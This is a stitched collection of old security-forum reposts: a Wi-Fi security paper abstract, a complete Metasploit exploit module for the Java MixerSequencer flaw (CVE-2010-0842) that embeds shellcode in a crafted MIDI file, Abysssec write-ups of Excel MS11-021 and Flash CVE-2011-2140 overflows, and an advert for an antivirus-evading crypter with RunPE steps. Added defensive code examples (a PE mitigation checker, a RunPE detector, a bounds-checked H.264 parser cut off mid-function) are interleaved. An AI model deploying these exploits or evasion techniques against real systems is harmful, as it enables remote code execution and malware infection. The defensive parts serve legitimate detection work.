© 2011, Corelan Team (corelanc0d3r). All rights reserved.

See it at the source; fuck this goddamn vbulletin, don't bother with this crap.

Source: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
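The reason msvcr71.dll works as a universal gadget source is stated above: it lands at the same address every time because it does not rebase and does not opt into ASLR. Both properties are declared in the PE header, so the defender's counterpart is an inventory of loaded modules for exactly those flags. This is an added example, not Corelan's or mona's code; it reads the COFF and optional headers with the documented IMAGE_FILE_* / IMAGE_DLLCHARACTERISTICS_* values and, instead of a real DLL, exercises the parser on a constructed minimal header built by build_test_header (a helper introduced here, not a real-world file).

```python
import struct

# Documented PE flag values.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001             # COFF Characteristics: no relocations, cannot be rebased
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image opts into ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image declares DEP compatibility

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_FMT = "<HHIIIHH"
DLLCHARS_OFFSET = 70   # DllCharacteristics inside the optional header, same for PE32 and PE32+


def parse_mitigations(data):
    """Read the headers of a PE image and report the load-time mitigations it declares."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    (_machine, _nsections, _stamp, _symtab, _nsyms,
     opt_size, file_chars) = struct.unpack_from(COFF_FMT, data, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_FMT)
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC) or opt_size < DLLCHARS_OFFSET + 2:
        raise ValueError("unsupported or truncated optional header")
    dll_chars = struct.unpack_from("<H", data, opt_off + DLLCHARS_OFFSET)[0]
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "relocatable": not (file_chars & IMAGE_FILE_RELOCS_STRIPPED),
    }


def fixed_address_reasons(data):
    """Why this module would load at its preferred base every time (empty list = it will not)."""
    m = parse_mitigations(data)
    reasons = []
    if not m["aslr"]:
        reasons.append("DYNAMIC_BASE not set: the loader will not randomise its base")
    if not m["relocatable"]:
        reasons.append("relocations stripped: the image cannot be rebased at all")
    return reasons


def build_test_header(dll_chars, file_chars=0x2102, pe32plus=False):
    """Constructed minimal PE header (no sections) for exercising the parser; not a real DLL.
    0x2102 = IMAGE_FILE_DLL | IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_EXECUTABLE_IMAGE."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff = struct.pack(COFF_FMT, 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, file_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, DLLCHARS_OFFSET, dll_chars)
    return dos + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    legacy = build_test_header(dll_chars=0x0000)   # header shaped like a pre-ASLR-era CRT DLL
    modern = build_test_header(dll_chars=0x0140)   # DYNAMIC_BASE | NX_COMPAT
    for name, image in (("legacy", legacy), ("modern", modern)):
        print(name, parse_mitigations(image), fixed_address_reasons(image))
```

Point parse_mitigations at the bytes of any module on disk to see whether it would give an attacker the same fixed addresses msvcr71.dll does.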
  16. Wi-Fi Security with Wi-Fi Protection Plus
Ajin Abraham, Joseph Sebastian
Vimal Jyothi Engineering College.
ajin25 @ gmail.com +91-9633325997
josephs_18 @ live.com +91-9495587202

Abstract
Current industrial standards of Wi-Fi security are found to have security loopholes, making it possible for hackers to break them. So we consider the possibility of a new technology for Wi-Fi security. We call it Wi-Fi P+ or Wireless Fidelity Protection Plus.

Introduction
Wi-Fi is common nowadays. Every educational institution and business organization has got its perimeter covered in Wi-Fi. All the confidential data being transmitted through Wi-Fi makes it a target for hackers. To secure it, some Wi-Fi security standards like WEP, WPA, and WPA2 were introduced. Each of them was introduced when the previous security architecture was found to be a failure. But in the present situation all of these industrial standard Wi-Fi security architectures are found to have vulnerabilities, so that a hacker can hack into the Wi-Fi network.

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18486.pdf
  17. [h=1]Java MixerSequencer Object GM_Song Structure Handling Vulnerability[/h]

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
      'Description'    => %q{
          This module exploits a flaw within the handling of MixerSequencer objects
          in Java 6u18 and before. Exploitation is done by supplying a specially
          crafted MIDI file within an RMF File. When the MixerSequencer object is
          used to play the file, the GM_Song structure is populated with a function
          pointer provided by a SONG block in the RMF. A Midi block that contains a
          MIDI with a specially crafted controller event is used to trigger the
          vulnerability. When triggering the vulnerability "ebx" points to a fake
          event in the MIDI file which stores the shellcode. A "jmp ebx" from
          msvcr71.dll is used to make the exploit reliable over java updates.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Vreugdenhil', # Vulnerability Discovery and exploit
          'juan vazquez',      # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2010-0842' ],
          [ 'OSVDB', '63493'],
          [ 'BID', '39077'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ],
          [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/']
        ],
      'Payload'        =>
        {
          'Space' => 8000,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC'             => "process",
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # Tested successfully on:
            # Windows XP SP3 / IE 6 / Java 6u18
            # Windows XP SP3 / IE 7 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u18
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u17
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u17
            # Windows 7 / IE 8 / Java 6u18
            'Windows / Java 6 <=u18',
            {
              'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 30 2010",
      'DefaultTarget'  => 0))
  end

  def get_rmf
    rmf_header = ""
    rmf_header << "IREZ"              # RMFHeaderMagic
    rmf_header << "\x00\x00\x00\x01"  # RMFVersionNumber
    rmf_header << "\x00\x00\x00\x02"  # NumberOfRMFBlocks

    song_block = ""
    song_block << "\x00\x00\x00\x65"                  # OffsetToNextBlock
    song_block << "SONG"                              # BlockType
    song_block << [target.ret].pack("N")              # BlockID
    song_block << "\x00"                              # BlockName
    song_block << "\x00\x00\x00\x47"                  # BlockDataSize
    song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01"  # BlockData
    song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08"  # BlockData
    song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00"  # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00"  # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00"  # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00"  # BlockData
    song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1"  # BlockData
    song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86"  # BlockData
    song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7"  # BlockData

    midi = ""
    # HEADERCHUNK Header
    midi << "MThd"              # Header
    midi << "\x00\x00\x00\x06"  # Chunk size
    midi << "\x00\x01"          # Format Type
    midi << "\x00\x01"          # Number of tracks
    midi << "\x00\x08"          # Time division
    # TRACKCHUNK header
    midi << "MTrk"              # Header
    midi << "\x00\x00\x24\xd7"  # Length
    midi << "\x00\xb0\x80\x00"  # Controller Event # Triggers the vulnerability
    # Fake Midi Meta event - Shellcode
    midi << "\x38"              # Variable length delta time
    midi << "\xff"              # Midi meta event
    midi << "\x02"              # Meta event type 02 => Copyright notice
    midi << "\xc9\x50"          # Variable Meta Event Length
    midi << payload.encoded
    midi << rand_text(9123 - payload.encoded.length)

    midi_block = "\x00\x00\x25\x60"  # OffsetToNextBlock
    midi_block << "Midi"             # BlockType
    midi_block << "\x00\x00\x7f\xff" # BlockID
    midi_block << "\x00"             # BlockName
    midi_block << "\x00\x00\x24\xed" # BlockDataSize
    midi_block << midi               # BlockData

    rmf = ""
    rmf << rmf_header
    rmf << song_block
    rmf << midi_block

    rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf"

    return rmf_name, rmf
  end

  def get_jar
    files = [
      [ "MyController.class" ],
      [ "MixerMidiApplet.class" ],
      [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ]
    ]

    jar = Rex::Zip::Jar.new
    jar.add_file("META-INF/", "")
    jar.add_file("META-INF/services/", "")
    jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842"))
    jar.build_manifest

    jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar"

    return jar_name, jar
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.jar$/i
      print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-stream'})
      return
    end

    if request.uri =~ /\.rmf$/i
      print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @rmf, {'Content-Type'=>'application/octet-stream'})
      return
    end

    base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    rmf_uri = base_uri + "/#{@rmf_name}"
    jar_uri = base_uri + "/#{@jar_name}"

    html = %Q|
    <html>
    <head>
    </head>
    <body>
    <applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200>
    <param name="midifile" valuetype="ref" value="#{rmf_uri}">
    </applet>
    </body>
    </html>
    |

    html = html.gsub(/^\t\t/, '')

    print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def exploit
    @jar_name, @jar = get_jar
    @rmf_name, @rmf = get_rmf
    super
  end

end
```

Source: Java MixerSequencer Object GM_Song Structure Handling Vulnerability
  18. [h=2]Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)[/h]
Posted by shahin in Exploits / BUG Decryption

Hello all, as we didn't publish any exploit for a bit, we are just going to release one.

[h=2]1) Advisory information[/h]
Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability
Vendor : Microsoft Corporation
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

[h=2]2) Vulnerability detail[/h]
Each Excel file can contain multiple BOF (2057) records. This record specifies the first substream associated with the workbook. One of the fields in these records specifies the substream record to come with. This field can be extracted from the sub_3018F0C2 function.

```
.text:301A0C87 push    [ebp+arg_2C]
.text:301A0C8A mov     ecx, [ebp+var_14]
.text:301A0C8D push    1
.text:301A0C8F call    sub_3018F0C2
.text:301A0C94 mov     ecx, eax
.text:301A0C96 mov     eax, [ebp+arg_24]
.text:301A0C99 cmp     eax, ebx
.text:301A0C9B mov     [ebp+var_10], ecx
.text:301A0C9E jz      short loc_301A0CA2
.text:301A0CA0 mov     [eax], ecx
```

If the field value is equal to 400, the sub_3019DFBA function is called to check the file type. If the file type is xls, EXCEL.exe will display a message; if approved, it will continue to run the code. If you change the file extension to xlb there will not be any message. After this step the sub_3053F626 function will be executed. This function will parse the next BOF records.
```
.text:304D4E9D cmp     [ebp+arg_20], ebx
.text:304D4EA0 jnz     short loc_304D4EC6
.text:304D4EA2 test    dword ptr word_30EDCF9C, 2000000h
.text:304D4EAC jnz     short loc_304D4EC6
.text:304D4EAE mov     edx, [ebp+arg_C]
.text:304D4EB1 mov     ecx, [ebp+arg_8]
.text:304D4EB4 push    3Fh
.text:304D4EB6 call    sub_3019DFBA
.text:304D4EBB cmp     eax, ebx
.text:304D4EBD mov     [ebp+var_8], eax
.text:304D4EC0 jz      loc_304D4FD3
.text:304D4EC6
.text:304D4EC6 loc_304D4EC6:                   ; CODE XREF: sub_301A0BC7+3342D9j
.text:304D4EC6                                 ; sub_301A0BC7+3342E5j
.text:304D4EC6 push    ebx
.text:304D4EC7 push    dword_30EB89A4
.text:304D4ECD push    [ebp+var_C]
.text:304D4ED0 call    sub_3053F626
.text:304D4ED5 cmp     dword_30F5E64C, ebx
.text:304D4EDB mov     [ebp+var_8], eax
.text:304D4EDE jz      short loc_304D4EE7
.text:304D4EE0 cmp     eax, ebx
.text:304D4EE2 jz      short loc_304D4EE7
```

One of the records that may come after BOF is an undocumented record which has a record type equal to 0xA7 (167). For proper parsing this record should come with another record with record type 0x3C (60). If it meets this requirement, the length of the records will be read and copied to the stack. The function which performs the copying of data records onto the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which will be read from the file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data that can be copied.
The values of the second and third arguments are based on amounts computed from what is read from the file, and in this computation a computational error may occur here…

```
.text:3053F830 call    sub_301A0A01
.text:3053F835 cmp     eax, 3Ch
.text:3053F838 mov     [ebp+var_ED4], eax
.text:3053F83E jnz     loc_30540488
.text:3053F844 call    sub_301A0A01
.text:3053F849 mov     ecx, [ebp+var_EDC]
.text:3053F84F imul    ecx, [ebp+var_F00]
.text:3053F856 mov     edi, eax
.text:3053F858 mov     eax, [ebp+var_EE0]
.text:3053F85E lea     ebx, [ecx+eax+3]
.text:3053F862 call    sub_301A0ABE
.text:3053F867 push    0FFFFFFFDh
.text:3053F869 pop     edx
.text:3053F86A sub     edx, ecx
.text:3053F86C add     eax, edx
.text:3053F86E push    eax             ; Dst
.text:3053F86F push    ebx             ; int
.text:3053F870 mov     eax, edi
.text:3053F872 call    sub_30199E55
```

The vulnerability that exists here is that we can change the value of parameter 3 with our own values. The program does not correctly control the third argument of sub_30199E55, and this can result in the desired amount of desired data overwriting the desired location on the stack.

```
.text:30199E60 cmp     edi, [esp+4+Dst]
.text:30199E64 ja      loc_303EE1B7
.text:30199E6A mov     ecx, [esp+4+arg_0]
.text:30199E6E push    ebx
.text:30199E6F mov     ebx, dword_30F726C0
.text:30199E75 push    ebp
.text:30199E76 mov     ebp, nNumberOfBytesToRead
.text:30199E7C push    esi
.text:30199E7D mov     [esp+10h+Dst], ecx
....
.text:30199E93 mov     eax, [esp+10h+Dst]
.text:30199E97 push    esi             ; Size
.text:30199E98 lea     edx, dword_30F6E6B8[ebx]
.text:30199E9E push    edx             ; Src
.text:30199E9F push    eax             ; Dst
.text:30199EA0 sub     edi, esi
.text:30199EA2 call    memcpy
.text:30199EA7 add     [esp+1Ch+Dst], esi
.text:30199EAB add     ebx, esi
.text:30199EAD add     esp, 0Ch
.text:30199EB0 test    edi, edi
.text:30199EB2 mov     dword_30F726C0, ebx
.text:30199EB8 jnz     loc_301E0DB3
```

[h=2]3) Exploitation :[/h]
Stack overflows are not hard to exploit at all! But we have both /GS and SAFESEH here. Because, given that we are destined to memcpy, we can change it so that it begins to overwrite the stack after GS,
and from there, when the return comes, our values are contained in ESP and we can call it with a simple call esp and the game is over!!!

[h=6]download full exploit source : MS11-021[/h]

Happy Hacking.

Source: Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) | Abysssec Security Research
  19. [h=2]bypassing all anti-virus in the world (Good Bye Detection , Hello Infection)[/h]
Posted by shahin in news, Pen-test Method, reversing

Hello to all readers.

[h=2]Introduction[/h]
As you may have read on @abysssec on Twitter, in the past few months we did some cool research on bypassing anti-viruses and got really great results. Bypassing anti-viruses is not a new topic and it's still about encrypting / decrypting a program to hide it from AV eyes. In the past it was a really, really easy task to do, but AVs are getting smarter, and bypassing all anti-viruses, with the really unique methods each of them uses, is neither fun nor easy to do. Before I go further I'd like to have a simple glossary for unfamiliar readers.

[h=2]Glossary[/h]
Crypter : the program (mostly GUI) that will crypt the malware / bot to hide it from anti-viruses
Stub : the decryptor of the crypted program
FUD : Fully UnDetectable (FUD = no AV detects it)
RUNPE : run the PE without headers in memory
USG : unique stub generator (makes unique stubs)
Binder : will join two files; will drop to HDD or memory
Pumper : will increase the size of the tool
EOF : end of file (in a crypter it needs to be preserved)
Cloner : will clone the file (decryptor-like, on HDD)
Icon Changer : will change the final exe icon

Well, there are also two different kinds of crypters: scan time and run time. The good crypter is the run time one, because, as its name says, the scan time crypter is just FUD at scan time, and when you run it, after the real malware is decrypted it will be detected, so it's not that useful. The real crypter is the runtime one.

[h=2]How it works ?[/h]
If we remove all the complex technical info, bypassing all 35 anti-viruses around the world works really simply: it simply encrypts the program, decrypts it, and then runs it in memory. The encryption algorithm is not important and simple ideas are enough to make a crypter FUD, but some of the mostly used algorithms are:
I. RC4
II. AES
III. DES
IV. TEA
V. XOR
VI. CryptoAPI
VII.
blowfish note that there is important part in your job and that is run the malware safely in memory after decrypting it , and this is done by RunPE . the idea of RunPE comes from great PoC by Tan Chew Keong called dynamic forking of win32 exe : SIG^2 G-TEC - Dynamic Forking of Win32 EXE steps and idea are really sample : CreateProcess Find Base address Virtualalloc Align sections Fix thread context Resume thread but this is not easy to hide this kind of API chaining from anti-viruses . so we finished our research by writing a new fud crypter and our crypter is unique and different with public ones . our crypter is unique and can bypass all 35 exist av right now . here is list of AV we fully tested our crypters on them . - Ad-Aware - AhnLab V3 Internet Security - ArcaVir - Avast - Avast 5 - AVG Free - AntiVir (Avira) - BitDefender - BullGuard - VirusBuster Internet Security - Clam Antivirus - COMODO Internet Security - Dr.Web - eTrust-Vet - F-PROT Antivirus - F-Secure Internet Security - G Data - IKARUS Security - Kaspersky Antivirus - McAfee - MS Security Essentials - ESET NOD32 - Norman - Norton Antivirus - Panda Security - A-Squared - Quick Heal Antivirus - Rising Antivirus - Solo Antivirus - Sophos - Trend Micro Internet Security - VBA32 Antivirus - Vexira Antivirus - Webroot Internet Security - Zoner AntiVirus we even tested 10 year ago malware and our crypter can hide them from any anti-virus system . our crypter comes with some unique features here is some of them - FUD 0 / 35 detection - EOF support - Coded in C/ASM Stub and GUI In C# - Compatible with Win 2k/XP/7 x32 and x64 - Ability of bypassing heuristic and emulators (Kaspersky pro-acvtive defense , Nod32 advanced heuristic , Norton Sonar, Avira heuristic) - Command line support - Unicode support (chines , russian and so on) - Right-to-Left Exploit after crypting you can have .mp3 , doc , pdf , avi or anything as output !!! 
- inbuilt scanner and scanning with 35 anti-virus after cryptring - advanced file binder with drop in disk and memory - Anti-debug - Anti-sandbox - advanced encryption : Double XOR , RC4, AES256 - Advanced resource storage : unique method here is some screen shot of GUI : and finally you can see the actual work in a demo here : http://abysssec.com/files/VampCrypt.rar as we don’t want harm anyone if you are : - penetration testing company - anti virus / IDS company - any legit company who needs it ” please note that WE DON”T give tool / technology to PERSON . ONLY VERIFIED COMPANY ” contact : info [at] abysssec.com and as always you can follow @abysssec in twitter happy fudding . Sursa: bypassing all anti-virus in the world (Good Bye Detection , Hello Infection) | Abysssec Security Research
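Detection-side illustration of the RunPE API chain listed in the post above (CreateProcess, VirtualAlloc, fix thread context, resume thread), as an added example that is not part of the original post or of Abysssec's tool: a small per-process state machine that walks API-trace log lines and flags a process only when the ordered chain CreateProcessW with CREATE_SUSPENDED, then VirtualAllocEx, then SetThreadContext, then ResumeThread completes. The log format (pid=, api= and flags= fields) and every trace line are constructed for this example; VirtualAllocEx and SetThreadContext are assumed as the concrete Win32 calls behind the post's "VirtualAlloc" and "Fix thread context" steps.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Ordered Win32 API sequence that characterises the RunPE chain from the post
 * (assumption: VirtualAllocEx and SetThreadContext are the concrete calls behind
 * "VirtualAlloc" and "Fix thread context"). */
static const char *const CHAIN[] = {
    "CreateProcessW", "VirtualAllocEx", "SetThreadContext", "ResumeThread"
};
#define CHAIN_LEN (sizeof CHAIN / sizeof CHAIN[0])
#define MAX_PIDS 64

typedef struct { long pid; size_t stage; } track_t;

/* Copies the value following key (e.g. "api=") into out, stopping at a space.
 * Returns 0 when the key is present, -1 otherwise. */
static int field(const char *line, const char *key, char *out, size_t outlen) {
    const char *p = strstr(line, key);
    if (!p) return -1;
    p += strlen(key);
    size_t n = strcspn(p, " \n");
    if (n >= outlen) n = outlen - 1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Walks API-trace lines, keeping one stage counter per pid, and returns the
 * first pid that completes the whole chain in order, or -1 if none does.
 * Unrelated calls between stages are ignored; stage 0 only counts a
 * CreateProcessW whose flags include CREATE_SUSPENDED. */
long detect_runpe_chain(const char *const *lines, size_t nlines) {
    track_t tracks[MAX_PIDS];
    size_t ntracks = 0;
    for (size_t i = 0; i < nlines; i++) {
        char pidbuf[16], api[64], flags[64] = "";
        if (field(lines[i], "pid=", pidbuf, sizeof pidbuf)) continue;
        if (field(lines[i], "api=", api, sizeof api)) continue;
        field(lines[i], "flags=", flags, sizeof flags);   /* optional field */
        long pid = strtol(pidbuf, NULL, 10);
        track_t *t = NULL;
        for (size_t j = 0; j < ntracks; j++)
            if (tracks[j].pid == pid) t = &tracks[j];
        if (!t) {
            if (ntracks == MAX_PIDS) continue;             /* table full: skip, don't crash */
            t = &tracks[ntracks++];
            t->pid = pid;
            t->stage = 0;
        }
        if (strcmp(api, CHAIN[t->stage]) != 0) continue;
        if (t->stage == 0 && strstr(flags, "CREATE_SUSPENDED") == NULL) continue;
        if (++t->stage == CHAIN_LEN) return pid;
    }
    return -1;
}

/* Constructed trace lines: one benign parent (4100) and one hollowing chain (7312). */
static const char *const SUSPICIOUS_TRACE[] = {
    "pid=4100 api=CreateProcessW flags=0",
    "pid=4100 api=ReadFile",
    "pid=7312 api=CreateProcessW flags=CREATE_SUSPENDED",
    "pid=7312 api=GetThreadContext",
    "pid=7312 api=VirtualAllocEx",
    "pid=4100 api=VirtualAllocEx",
    "pid=7312 api=SetThreadContext",
    "pid=7312 api=ResumeThread",
};
/* Constructed debugger-style trace: suspended create and resume, no injection steps. */
static const char *const BENIGN_TRACE[] = {
    "pid=5120 api=CreateProcessW flags=CREATE_SUSPENDED",
    "pid=5120 api=GetThreadContext",
    "pid=5120 api=ResumeThread",
};
#define COUNT(a) (sizeof (a) / sizeof (a)[0])

int main(void) {
    printf("suspicious trace -> pid %ld\n", detect_runpe_chain(SUSPICIOUS_TRACE, COUNT(SUSPICIOUS_TRACE)));
    printf("benign trace     -> pid %ld\n", detect_runpe_chain(BENIGN_TRACE, COUNT(BENIGN_TRACE)));
    return 0;
}
```

Matching on any single API name alone would fire on debuggers and installers, which also create suspended children; requiring the ordered chain per pid is what turns the post's observation that this API chaining is hard to hide into a usable detection.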
  20. [h=2]Exploiting CVE-2011-2140 another flash player vulnerability[/h]Posted by shahin

hello all. before going further, we are sorry for not updating the blog regularly, but it's because we are busy with a stack of projects and also working on our expert training courses. so as we didn't post any blog post, here we go with another flash player exploit we wrote a long time ago.

[h=1]1) Advisory information[/h]
Title : Adobe flash player memory overwrite exploit
Version : <= 10.3.186.3
Discovery : Zero Day Initiative
Vendor : http://adobe.com
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

[h=1]2) Vulnerability Information[/h]
Class : 1- Stack Overwrite
Impact : Successfully exploiting this issue allows remote attackers to gain code execution on the vulnerable system
Remotely Exploitable : Yes
Locally Exploitable : Yes

[h=1]3) Vulnerabilities detail[/h]
[h=2]1- Stack overwrite vulnerability[/h]
Before we go deep into the vulnerability, to understand it you should take a look at the MP4 format and the H.264/AVC data structures. The actual vulnerability occurs during the processing of data units in the Sequence Parameter Set in MP4. The function sub_1005B396 is responsible for processing the Sequence Parameter Set.
In this function pic_order_cnt_type from the SPS is checked; if it is equal to 1, other fields like data_pic_order_always_zero_flag, offset_for_non_ref_pic and offset_for_top_to_bottom_field are initialized :

.text:1005B396 sub_1005B396 proc near ; CODE XREF: sub_1005B8DB+4Bp
.text:1005B397 push ebp
.text:1005B398 push esi
.text:1005B399 push edi
.text:1005B39A mov edi, ecx
.text:1005B39C call sub_1005A95B
.text:1005B3A1 mov esi, [esp+10h+arg_0]
.text:1005B3A5 mov ecx, edi
.text:1005B3A7 mov [esi], al
...
.text:1005B47D mov ecx, edi
.text:1005B47F mov [esi+20h], eax
.text:1005B482 call sub_1005AA64
.text:1005B487 mov [esi+40h], eax
.text:1005B48A cmp eax, ebp ; -> if( pic_order_cnt_type )
.text:1005B48C jnz short loc_1005B49D
...
.text:1005B49D loc_1005B49D: ; CODE XREF: sub_1005B396+F6j
.text:1005B49D xor ebx, ebx
.text:1005B49F inc ebx
.text:1005B4A0 cmp eax, ebx ; -> if( pic_order_cnt_type == 1 )
.text:1005B4A2 jnz short loc_1005B4EF
.text:1005B4A4 mov ecx, edi
.text:1005B4A6 call sub_1005A99A ; -> offset_for_top_to_bottom_field
.text:1005B4AB mov ecx, edi
.text:1005B4AD mov [esi+48h], al
.text:1005B4B0 call sub_1005AA93 ; -> offset_for_non_ref_pic
.text:1005B4B5 mov ecx, edi
.text:1005B4B7 mov [esi+54h], eax
.text:1005B4BA call sub_1005AA93 ; -> offset_for_top_to_bottom_field

Then num_ref_frames_in_pic_order_cnt_cycle is set, and if it is bigger than 0 the values in offset_for_ref_frame are copied into the buffer.

.text:1005B4BF mov ecx, edi
.text:1005B4C1 mov [esi+50h], eax
.text:1005B4C4 call sub_1005AA64 ; -> num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9 mov [esi+4Ch], eax
.text:1005B4CC test eax, eax
.text:1005B4CE jbe short loc_1005B4EF
.text:1005B4D0 lea eax, [esi+58h]
.text:1005B4D3 mov [esp+10h+arg_0], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7: ; -> do{
.text:1005B4D7 mov ecx, edi
.text:1005B4D9 call sub_1005AA93 ; -> offset_for_ref_frame
.text:1005B4DE mov ecx, [esp+10h+arg_0]
.text:1005B4E2 add [esp+10h+arg_0], 4 ; -> buf = &buf + 4
.text:1005B4E7 inc ebp ; -> i++
.text:1005B4E8 mov [ecx], eax ; -> buf = offset_for_ref_frame
.text:1005B4EA cmp ebp, [esi+4Ch]
.text:1005B4ED jb short loc_1005B4D7 ; -> } while(i < num_ref_frames_…)

You should have got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to offset_for_ref_frame is copied onto the stack, that's all.

[h=2]2- Exploitation[/h]
Thanks to the windows memory manager, the browser and the class of bug, it's not that hard to achieve RCE. The only thing we should care about is the return address, because the values copied from the MP4 file onto the stack come with changes. In other words, these values, after being read from the file, are decoded and then copied onto the stack. The values copied into the buffer are generated from the values in the file as Signed Exp-Golomb codes. After taking control of EIP it's easy to finish the job; we used a basic heap spray.
here is the reliable exploit : CVE-2011-2140
happy hunting !
Source: Exploiting CVE-2011-2140 another flash player vulnerability | Abysssec Security Research
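Parser-side illustration of the bug described in the post above, as an added example that is not part of the original article or of Adobe's code: a bounds-checked reader for the pic_order_cnt_type section of an H.264 SPS, including the unsigned and signed Exp-Golomb decoders (ue(v) and se(v)) the post refers to. The struct's fixed-size offset_for_ref_frame array mirrors the fixed stack buffer the disassembly copies into, and the check against the specification's limit of 255 on num_ref_frames_in_pic_order_cnt_cycle is the check the loop at loc_1005B4D7 lacks. The one-bit field the post calls data_pic_order_always_zero_flag is named delta_pic_order_always_zero_flag in the specification and here. The byte strings are hand-encoded test inputs constructed for this example, not data from any real MP4 file; the assumption is that the input is the raw SPS bit payload starting at pic_order_cnt_type with emulation-prevention bytes already removed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Upper bound the H.264 specification places on num_ref_frames_in_pic_order_cnt_cycle.
 * The array below is sized to it, so the comparison against it is exactly the
 * bounds check the vulnerable loop does not perform. */
#define MAX_REF_FRAMES_IN_POC_CYCLE 255

/* MSB-first bit reader over an in-memory buffer (assumption: raw SPS bit payload,
 * emulation-prevention bytes already stripped). */
typedef struct {
    const uint8_t *data;
    size_t nbits;   /* total bits available */
    size_t pos;     /* bits consumed so far */
} bitreader_t;

static int read_bit(bitreader_t *br, unsigned *out) {
    if (br->pos >= br->nbits) return -1;            /* truncated input */
    *out = (br->data[br->pos >> 3] >> (7 - (br->pos & 7))) & 1;
    br->pos++;
    return 0;
}

/* ue(v): n leading zeros, a one, then n suffix bits; value = 2^n - 1 + suffix. */
static int read_ue(bitreader_t *br, uint32_t *out) {
    unsigned bit, zeros = 0;
    uint32_t suffix = 0;
    for (;;) {
        if (read_bit(br, &bit)) return -1;
        if (bit) break;
        if (++zeros > 31) return -1;                /* malformed code */
    }
    for (unsigned i = 0; i < zeros; i++) {
        if (read_bit(br, &bit)) return -1;
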